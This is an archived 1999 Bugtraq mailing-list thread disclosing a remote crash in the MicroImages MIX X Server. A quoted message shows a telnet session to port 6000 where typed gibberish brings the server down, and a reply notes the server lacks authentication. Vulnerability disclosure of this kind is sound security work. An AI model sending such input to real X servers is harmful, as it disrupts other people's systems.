[12171] in bugtraq
Re: MicroImages MIX X Server
daemon@ATHENA.MIT.EDU (H D Moore)
Fri Oct 8 17:47:28 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <37FB8BE4.3A5C7863@consultant.com>
Date: Wed, 6 Oct 1999 12:50:28 -0500
Reply-To: H D Moore <secureaustin@CONSULTANT.COM>
From: H D Moore <secureaustin@CONSULTANT.COM>
X-To: jimf@ATG.COM
To: BUGTRAQ@SECURITYFOCUS.COM
The last version of MIX X Server I used did not have any authentication
to speak of (so xhost, xauth, etc). It not only crashed when I sent
garbage to it's tcp port, but tended to randomly crash the X
applications running on them. Just my .02 --
-HD
Jim Frost wrote:
>
> Jan Szumiec wrote:
> > I don't know whether anyone wrote about this, so here it goes.
> >
> > It is possible to bring down the XServer remotely ...
> >
> > $ telnet 192.168.1.2 6000
> > Connected to 192.168.1.2
> > Escape character is ^[
> > djkfhgjksdhgjklhgjklsdhgjklehrslhgsd
> > Connection closed by remote host.
> > $
> >
> > Basically telneting into port 6000 of the server and typing in random
> > gibberish, brings it down.
>
> Is the server xhost + or not? Might make a difference.
>
> jim
